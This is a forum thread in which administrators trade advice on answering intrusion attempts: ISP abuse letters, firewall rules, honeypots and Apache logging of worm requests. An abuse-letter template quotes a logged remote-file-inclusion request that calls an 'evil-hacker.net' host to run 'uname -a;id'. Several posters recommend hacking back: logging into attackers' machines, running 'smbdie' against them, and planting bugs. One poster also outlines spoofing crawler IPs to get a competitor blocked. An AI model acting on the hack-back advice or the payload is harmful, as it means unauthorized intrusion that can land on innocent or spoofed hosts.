Dealing with Intruders?

drakyri asks: "I've been running a server for a small company for a few months. Recently, the number of attempted intrusions has jumped from about one every week to several per day - and these are only the really obvious attempts, like idiots who try to log in as root from the outside. The problem is that I'm not sure what to do about this. I've got their IP addresses and can usually tracert their ISP's - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"

Re:Create a honeypot

[Anonymous Coward]

This probably would have to be the best option so far. Then you could also log how they cracked the machine (using another machine). This would let you secure your other machines as well.

(I've been told to say, "you're a facsist" so I did)

Corporate Gnome

[Destructo-Bot]

If there are indeed blatant attempts to gain access to your network and server, then a simple letter or email to their ISP should do the trick and help show your boss that you were trying to be proactive. Keep in mind that those IP's could be spoofed however, so without something a little more substantial than an IP addy, you are likely to be ignored by most major isp's.

Best chance for a response is to keep it polite and request a notification of what action (if any) they will take. Don't fill your letter or email full of legalese and vauge threats and I'm sure most of the people in charge of a particular abuse department will take you seriously enough. Whether or not they have the clout to take action on your behalf is another matter entirely however.

Another thing to do is to just keep yourself patched, firewalled, and a close eye on your network. If the attempts are rising, someone thinks your network/servers is/are an easy target. Prove them wrong and perhaps you won't need to write that letter after all.

Good luck.

Re:Your firewall....

[Anonymous Coward]

Yeah cause, there's no such thing as Dynamic IP addresses.

Better advice would be to only allow login connections (eg sshd) from known IP addresses.

Other measures depends on what services you are trying to secure, but make sure you've run through the http://www.cisecurity.com/ [cisecurity.com] lvl 1 benchmarks on an Internet connected machine (at the very least run the scoring tool).

My basic template to ISPs

[BrynM]

Please note that this is innefectual to send to some ISPs. You won't always get a response. Look everything up first! Go look up who owns an IP at ARIN [arin.net] and who has registered domain names at a lot of different places [google.com]. Think hard before you send unless you write something automated - You may not want to send anything to someone who is actually the kiddie that attacked you. The result of that mistake is annoying. Trust me.

Due to abuse, the following IP address(s) have been banned from accessing
mydomain.com and it's associated services. The abuse is detailed as
follows:

IP(s) Banned: 216.nnn.225.nn

Owner:
OrgName: SOME ISP
Address: 2 Hacker Home Street
City: Isabel
StateProv: CA
PostalCode: 01120
Country: US
Admin Address: noc@someisp.net

Reason:
Malformed URL - Attempted PHP Exploit
"216.nnn.225.nn - - [11/Aug/2004:10:03:03 -0700] "GET
/themes/default/theme.php?THEME_DIR=http://w ww.evil-hacker.
net/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352"

Severity: 5

Remaining bans until entire address block banned: 3

If you have any questions or need further explanation, please contact
admin@mydomain.com.

You
Your Title
Your Contact Info

Just my (short) experience. A suggestion.

[pasko]

Last week I managed to login as root into a machine (from a chinese domain, as usual) for which I had packets logged in my firewall's log. Then, I installed in that machine chkrootkit: lots of executables were wrong (rootkits). Then, someone logged in remotely and left in /root a "readme.txt" message warning me not to log in other's computers .... Finally I did three things: 1.- Send an e-mail to the contact-addresses retrieved from APNIC 2.- Copied my shutdown executable to that machine (the original was obviosly tricked) 3.- Remotely, executed @> shutdown -h now Just a suggestion.

Firewall?

[vandan]

Complaining to people won't get you anywhere, unless you go to the government and claim that you believe they are terrorists. That will get you some action.

My advise is to firewall them.

Personally I also try giving them a taste of their own medicine. You'd be surprised how many Windows machines are still vulnerable to the old 'smbdie'. I set up a cron job to 'smbdie' all hackers / spammers etc every 5 minutes. But of course this is horrible advise because ( and I'm sure everyone will respond and tell you that it's very naughty to fight fire with fire, and you will most likely go blind or some bullshit. )

So yeah. Firewall them. And if you've got time, email their ISP and tell them that you've firewalled them and if you have any complaints from customers about them not being able to access your sever, that you will advise them that their ISP is harbouring hackers and that they should switch ISPs.

Re:Create a honeypot

[welshwaterloo]

IMHO - If you're not completely sure your network is 101% secure, or you don't have several free hours a day it would be a bad idea to drop a honeypot anywhere near your network.

Think about it - it's a slap in the face to the would-be hacker.. It's like you're leading him on, then saying "Ner Ner!" when he breaks into the pot.
If your hacker is serious, he's gonna be really pissed about this.

Secure your network & keep it secure - no need to stir 'em up.

Somewhat offtopic, but how do people deal with DOS

[bretharder]

Somewhat offtopic, but how do people deal with DOS attacks?
I've had a person harrasing the forums at a website that I host.
I banned by IP and then he started using proxys,
so I had to write a script to ban his IP each time he logged in,
of course then he started creating new accounts;
so I had to change the forum registration to one account per unique email address.
And then he tried to DOS the site by visiting the site and locking down his F5 key.
(He accually confessed this to me in IRC; he had 4 other people do this with him.)
I sent Comcast (his isp) the IRC logs & the network monitor logs.
They sent me a generic response saying "blah blah blah.. this is an automated response".
And thats it.
So how do other /.ers deal with situations like this?
It's a personal website, and I don't have the funds to hire a lawyer.
I've banned his IP and ~6000 proxy IPs, but he still keeps getting through.

Re:Corporate Gnome

[JWSmythe]

No shit.. :)

I've received some really nasty Emails over the years from winners who just installed some firewall on their home machine, and wonder why we're sending packets to him from our port 80 to some high port on his machine. They're all demanding that we stop or they'll sue, blah, blah, blah.

I write a real friendly note back saying "sir, you were visiting a porn site at http://example.com. from which you detected the data coming back to you exactly as you requested. yada, yada, yada"

Once in a while our provider will get a new person in their abuse department, and forward those over. I kindly remind them to go back to their supervisor and ask them exactly what this traffic would mean. Then I write them a friendly letter explaining the basics of the Internet. :)

They are generally good about sending us only real problems, which are usually about sublet IP blocks. I either pass it on to their sales rep, or call them myself. Most customers I've delt with are very friendly about it.

We did have a federal agent show up in our office one day, about a hacking attempt from one of our networks (a sublet line). I called the sales rep, got the customer on the line, and they were already aware of it. It was an old unpatched machine, that they had taken offline a few days prior because they had already found it was broken into. They were still examining it, and offered to hold onto the drive for the investivator. I really like good customers.

Re:Create a honeypot

[ayjay29]

I agrre with the above. Also creating a honeypot will give these guys something to play with, something fun to do, which will mean they will be more likely to come back.

If they can't get anywhere, they will move on somewhere else...

Re:Yes, there are several good ways.

[JWSmythe]

Damn, you must have a lot of time on your hands..

We actively block viruses at the mail server, and our logs show over 20k came towards us yesterday. Want to parse my logs and report the infected machines? :)

And yes, we don't send the automagic "We received a virus" notices. Those are just plain annoying considering most headers are faked.

Re:Ignoring it == raising criminals

[BlackHawk-666]

If you don't want to ignore them, but rather take some action then you can combine tripwire (IIRC) with a shell action that firewalls their IP address. I used to do this for my home machine, but it's not really recommended for business machines. Here's what I did:

Set up tripwire to detect incomming conenctions to 139, 1433 and other ports that people shouldn't be attempting to reach.

Any attempts to open got a IPTABLES rule added against their IP

Every couple of weeks I'd clear it down and let it build up again

There would be better ways to do this, but it was mainly for basic home security and I wasn't worried about blocking whole companies (because of NAT/Proxy) because of one dick in the place. YMMV.

Re:Snort + Guardian

[Umrick]

We ran this configuration for about 3 months. The problem is the shear number of false positives by the default snort rules. If you can't spend the time trimming down the ruleset to bare minimum to cover your needs, you will be locking out end users.

Classic for us was one user who had multiple domains with us got blocked every time she went to view one of her pages. Turns out the snort rule was so generic it was just looking for /calendar, so anything containing that would get trashed.

In the general sense, most likely you won't get a whole lot of cooperation from the ISP (gone are the days of the minions at Erol's). Stay patched, use common sense, and ignore it.

Ignoring it == making the problem worse

[SgtChaireBourne]

The network administrator at one site I was at reduced the number of intrusions by more than 1/3 over a 2 month periond and kept it down the whold time she kept the job.

How? When she found out about attacks and attempted intrusions, she got on the phone with the netblock owner and gave them an earful and followed up until something happened, even if it was only a small improvement. If need be, she reported it to the police and was even able to convince them that crime was an area of their responsibility even if they did not currently have the expertise.

The attacks dropped off rapidly after a few weeks. And since shed kept notes about who she talked with, when and about what, there was very little runaround. When she started that, it took about 45 minutes per day, but by the end it was down to around 15 on average.

Re:Abuse@

[AllUsernamesAreGone]

At least in the UK (where I have themost experience fo computer laws), attempting to gain unauthorised access to a machine is a criminal offense under the Computer Misuse Act 1990, even conspiracy to do it is an offense. This is true whether you are a UK national or not - if you attack a machine in the UK and a report is passed to the police and the police investigation identifies you then the minute you set foot on British soil you could be arrested and prosecuted under the act (significant offenses may even result in extradition). I know several other countries have similar laws, I expect the US has as well.

Google's Cache of above page.

[Ch_Omega]

Seems like me posting that link, has resulted in it exceeding its allowed bandwidth. Here's the Google Cache [216.239.59.104].

Re:Two things

[3rd_Floo]

Even better one would be for an intruder to take note of which DNS server your connecting to, then BOOM, quick spoofed scan and you cant get DNS. While your DNS is out and you are trying to get your connectiong working they slip inline on you and 'pretend' to be your DNS, now they can poison you really easily... of course, muggiling with the routing tables of a up stream switch and whatnot to pass themselves off as a DNS server, or hijacking the upstream DNS isnt always the easiest, but it would be a dirty way to slip into a large corp's systems if the security was set like such...

I agree!

[Mold]

Back when I was 13 or so, one of my friends had convinced me that trying something like this would be fun. I was a bit reluctant, but I had some knowledge of Unix and networking, and it did sound like fun.

We never actually got into anything, but the next day I got an e-mail from one of the companies we had attempted to break into, politely asking me to stop. It scared the shit out of me and I never attempted anything like that again.

And to be honest, the fact that I'd been caught and asked to stop (nicely!) impressed me far more than any of the hackers out there.

Upstream blocking

[Etherael]

It would be nice to adopt a routing protocol extension where you could ask an upstream router to block packets meeting a given criteria (*only to yourself, of course*). This would destroy DDOS attacks, which are currently the only really unstoppable attacks in existance, say you're getting flooded by ICMP from 250 hosts, and you just tell the upstream router to block ICMP traffic from the hosts in question (or for convenience sake, altogether, whatever really) It'd pretty much leave you scot free, in fact if it was extended further, DDOS zombies might get to the point that all their outbound traffic was blocked at their closest non controlled router point, which might clue in the users as to the status of their machines.

Patent Pending!

Re:Very Easy

[IANAAC]

Agreed. But what he doesn't need is a legal "boot up the arse" that will haunt him for the rest of his life. The trick is giving him the former without the latter.

So, you convince his ISP to issue a "You're no longer welcome here because you agreed to an AUP that forbids what you were trying to do" to him.

Unfortunately, ISPs are bogged down with requests like these, so probably not much will/can be done realistically.

Re:This is more fun!

[Tassach]

Why waste bandwidth and CPU time sending a page back to what's most likely a worm-infected machine? The default 404 response is more than adequate. His RedirectMatch hack is pretty good, but you can use the same regexps in SetEnvIf rules:

#regexp rules to set environment variables
SetEnvIf Request_URI "(regexp1)" ATTACK
SetEnvIf Request_URI "(regexp2)" ATTACK
...

# Anything that matches a worm/virus attack pattern goes in a special log
CustomLog logs/attack_log common env=ATTACK

# Everything that's not an attack goes on the normal log
CustomLog logs/access_log common env=!ATTACK

This puts all the zombie/worm attacks into a seperate log file. This also allows me to have logrotate truncate the attack_log and the access_log on different schedules.

Re:This is more fun!

[Tassach]

Opps... forgot the most important part:

<Location />
Order Allow,Deny
Allow from all
Deny from env=ATTACK
ErrorDocument 403 "Worm Attack Suspected - Access Denied
</Location>

You could replace the errordocument with a PHP or CGI to send back a page of shame instead of static text, but why bother?

Re:Two things

[Xner]

Who said anything about blocking a local port? If it's port SCANNING every port will be touched once or twice, and blocking local ports as they are touched is not going to have any meaningful effect. What the OP is talking about is adding a firewall route to ignore whatever comes from the address that is doing the scanning as soon as you detect it, ie. in the case of a "fast" scan, 3 or 4 ports into the thing.

Your "there's a whole lotta IPs in the world" comment is seriously asinine as well. As I mentioned, it is trivial to spoof portscans, and while there may be a whole lotta IPs in the world, once you have accidentally firewalled off the ones belogning to your DNS or your mail server, you are going to have some serious networking issues. Running out of "kernel memory" (whatever that might be) is the last of his worries.
Automated security response is a tricky business, and if you do not carefully consider all implication, you are goign to be worse off than you were, not better.

Don't take my word for it. Set up your PC this way and see how long it takes before someone uses it against you.

Re:I agree!

[LaCosaNostradamus]

This essentially sums up my shoplifting experience as a young teen. I was warned that I was seen taking an item, and that I should go back and "find" it and return it. I went to the back of the store, pulled the gum out of my pocket, and returned it to the shelf. No police, no threats ... but a firm reminder that I was as "caught" as they wanted me to be. The scare factor worked, and I never shoplifted again. Kids are kids, and the entire thing seemed wisely handled.

Re:Two things

[BlackHawk-666]

You're right, it was portsentry. I also ran tripwire to check the integrity, but it was a while ago so my memories were fuzzy. You're wrong about the no more Slashdot and Google, the connections being firewalled were incoming, not outgoing.

Re:Very Easy

[networkBoy]

Agreed. But what he doesn't need is a legal "boot up the arse" that will haunt him for the rest of his life. The trick is giving him the former without the latter.


Exactally. What I've tended to do is when I see an obvious script kiddie hitting my server over and over (with the same damn script like it'll work the second/third/tenth time) is hack 'em back. I realize this only works if you catch them in the act, else you may hit someone else, but my general preference is to print the following to their printer:

"Hey Cockbite: If you're going to try and hack someone, pick an admin who won't hack back"

All in all it's harmless, but hopefully gives them the hint that they're being stupid. Also I've been known to drop in a bug that lets me know their current IP address so I can print the above message randomly for a month or so. Let them explain to mom and dad WTF is going on! Way better results than ruining their life with the cops. ;)

-nB

Set up a sting.

[infosinger]

Why not create a honey pot that is weak enough for them to compromise it? Then you have evidence of a break in and the grounds to prosecute. Assuming you can identify the offender through the ISP you can make some serious threats with definite consequences.

Re:Very Easy

[cdrudge]

If it's the same person multiple times, yes. If it's one person once, ignore it.

I know that I occasionally forget who I'm connecting into and try to login as root out of habit but then realize where I'm at. Using your example, it would be like walking towards a car in the parking lot that looks like yours and trying the handle...but just as you do realizing that it's not your car.

Re:Easy

[eric76]

In 1982 or so, I was working for a pipeline engineering company.

One Saturday afternoon, I went to the office to do something on the computer (PDP 11/70). I was doing some disk work on the computer and didn't want anyone logged on accessing the disk while I did it.

Before starting, I did a "systat" (system status command) and saw someone had dialed in from outside and was logged onto a games account.

So I kicked him off, but he just dialed back in again. Every time I kicked him off, he was back in a minute.

So I modified the login utility so that if you dialed in, it would tell you to call the number in the computer room and then drop the line.

After a few minutes, he called! It sounded like a high school kid.

I told him what I was doing and suggested he wait a while before calling back.

After I finished what I was doing, I started wrote a little utility to take a snapshot of the system every six seconds and save the differences. I had a simple version working that evening and made some nice modifications to it the next couple of days.

From then on, if he had ever logged back in, we could have detected just about anything he might do. But he never did log back onto the computer again.

I never did know who the kid was, but my best guess was that it was the son of someone at the office.

Re:Two things

[justMichael]

I'm sorry, but how is adding an incoming port block on a firewall going to prevent using google? Serving up a quake server, maybe, but outgoing surfing and the like sure isn't going to stop him.

Blocking googls IPs isn't going to keep you from searching, but it will keep google off your site.

Example: A competitor that just happens to rank higher than you automatically drops packets from any IP that trys an invalid login.

You go through your logs and generate a list of all google's bots and then launch an "attack" against your competitor spoofing those IPs. You just stopped google from indexing their site. Move on to Yahoo and any other search engine you feel like.

Granted somebody is going to be watching the logs and start to wonder why google hasn't visited in a while, but you get the point.

I want a honeypot-on-a-disc

[Feanturi]

I think it would be neat to have a program that could be easily installed on a box, that would act as the firewall for the system. Traffic that a firewall would normally allow is passed normally. Traffic that would normally be dropped, such as a query to a port that is not open on the firewall, would not be dropped but instead be passed to the honeypot module of the program, and from there responded to in a way set by the user through a scripting interface.

Example: You aren't running a telnet server on your box, so normally a connection attempt to port 23 would be dropped. Here you set your honeypot controls to engage a script that you have made (or that came pre-packaged with the software) showing them a fake login prompt that looks like whatever software you wish them to think you are using. Script appropriate responses to possible actions the hacker might try, based on what software they think you have. Let them appear to login with 'admin/admin' or whatever, and show them fake file directories and whatnot. Certain often-targetted files could be spoofed so the cracker can actually 'read' them and not be tipped off. Basically have the software fuck with them for awhile before revealing that "it's all been logged you luser, the Matrix has you, disconnect before things get worse"

You could make a windows box look like anything else to mess with them, if your arsenal of scripts is deep enough. The program could come with a whole whack of pre-defined scripts, and users could create and upload new scripts to a website for others to install in their systems. And when someone installs and runs the program for the first time, they are *forced* to choose a computer name, OS, and other details, so that every out-of-the-box install of this thing doesn't look like every other one out there, making it less easy to detect.

You'd have to make the main code smart enough to not bother if the intrustion appears to be a worm, otherwise such a machine would likely get pretty bogged down. I don't know how to do any of this, I would just like to have the software.

Please? Somebody?

Re:Very Easy

[NanoGator]

"Oh ho. So a kid who walks up to your car and tries the doorhandles is not guilty of anything untoward?"

No, he is not. I agree that he should be informed that it's not cool, but he doesn't need to have boot up his arse or to be called guilty of anything. Frankly, kids are curious. I've tried doorhandles before, it had nothing to do with me being up to no good. I was just curious if people really locked their cars.

Re:Very Easy

[Chazman]

Oh ho. So a kid who walks up to your car and tries the doorhandles is not guilty of anything untoward?

No. Trying a door handle does not imply mal-intent. It's the response when a door handle actually works that matters. I'll give you an anecdote. I was arriving at a semi-nice restaurant in a somewhat out of the way area of an otherwise nice town. Parking was scarce, so I had to park on a tiny unlit side-street. Walking toward the restaurant from my car, I saw another car on the street with its dome light on. It was obvious from a reasonable distance that there was no one in the car, but there was a pocketbook left on the front seat. Being a good sumeritan, I said "that won't do -- the pocketbook will get stolen, and the dome light will drain the battery". So I tried the door handle. To my surprise, it opened. I quickly turned to dome light off, closed the door again, and walked away. Turns out this was a sting. There had been a bunch of thefts from cars in the area recently, and this being a good town, the cops had enough time to set up a honeypot to try to catch the perp. They were quite chagrined to find someone go for the bait for an entirely altruistic reason -- to prevent a stranger from becoming the dual victim of a theft and a dead battery. Maybe I took a risk by trying that door handle and attempting to do some good. But how would you know if you deign to put a boot up my arse the instant I touch the doorhandle?

Perhaps the analogy doesn't port over all that well to scans of TCP ports, but it wasn't I who began that analogy; I'm just answering it.